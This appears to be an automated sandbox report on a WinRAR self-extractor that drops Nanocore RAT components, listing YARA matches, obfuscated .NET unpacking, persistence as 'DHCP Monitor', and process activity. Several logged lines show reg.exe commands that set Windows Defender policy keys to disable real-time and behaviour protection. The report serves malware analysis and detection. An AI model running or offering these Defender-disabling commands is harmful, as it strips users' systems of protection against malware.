          Source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Service.exe.0.dr Static PE information: Section: .rsrc ZLIB complexity 0.999430803571
          Source: dhcpmon.exe.2.dr Static PE information: Section: .rsrc ZLIB complexity 0.999430803571
          Source: Service.exe.0.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: Service.exe.0.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
          Source: Service.exe.0.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
          Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: Service.exe.0.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: Service.exe.0.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engineClassification label: mal100.troj.evad.winEXE@24/6@8/2
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01316E29 GetLastError,FormatMessageW,
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E010DA AdjustTokenPrivileges,
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E010A3 AdjustTokenPrivileges,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01329F5C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
          Source: C:\Users\user\Desktop\Service.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6740765Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
          Source: C:\Users\user\Desktop\Service.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{f0ee6c15-7813-4f2f-a8f4-f86f2a48b89f}
          Source: C:\Users\user\Desktop\Service.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6976:120:WilError_01
          Source: C:\Users\user\Desktop\Main.exeFile created: C:\Users\user\AppData\Local\Temp\DFA1.tmpJump to behavior
          Source: C:\Users\user\Desktop\Main.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCommand line argument: sfxname
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCommand line argument: sfxstime
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCommand line argument: STARTDLG
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Service.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Service.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\Desktop\Service.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: 01d32b29_by_Libranalysis.exeVirustotal: Detection: 48%
          Source: 01d32b29_by_Libranalysis.exeReversingLabs: Detection: 55%
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile read: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe 'C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Main.exe 'C:\Users\user\Desktop\Main.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Service.exe 'C:\Users\user\Desktop\Service.exe'
          Source: C:\Users\user\Desktop\Main.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe query 'HKU\S-1-5-19\Environment'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f
          Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
          Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Main.exe 'C:\Users\user\Desktop\Main.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Service.exe 'C:\Users\user\Desktop\Service.exe'
          Source: C:\Users\user\Desktop\Main.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe query 'HKU\S-1-5-19\Environment'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Service.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
          Source: C:\Users\user\Desktop\Service.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 01d32b29_by_Libranalysis.exe
          Source: Binary string: C:\Windows\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: lib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: Service.exe, 00000002.00000002.604812875.00000000055A0000.00000002.00000001.sdmp
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Service.exe.0.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: Service.exe.0.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: dhcpmon.exe.2.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Main.exe | Code function: 1_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6740765
          Source: 01d32b29_by_Libranalysis.exe | Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132E3CC push eax; ret
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132EEA6 push ecx; ret
          Source: C:\Users\user\Desktop\Main.exe | Code function: 1_2_000000014001BD2E push rbx; ret
          Source: C:\Users\user\Desktop\Service.exe | Code function: 2_2_00F29D74 push eax; retf
          Source: C:\Users\user\Desktop\Service.exe | Code function: 2_2_00F2AA7B push cs; retf
          Source: C:\Users\user\Desktop\Service.exe | Code function: 2_2_00F29D78 pushad ; retf
          Source: C:\Users\user\Desktop\Service.exe | Code function: 2_2_00F2A993 push cs; retf
          Source: C:\Users\user\Desktop\Service.exe | Code function: 2_2_00F2AA07 push cs; retf
          Source: Service.exe.0.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: Service.exe.0.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: dhcpmon.exe.2.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: dhcpmon.exe.2.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
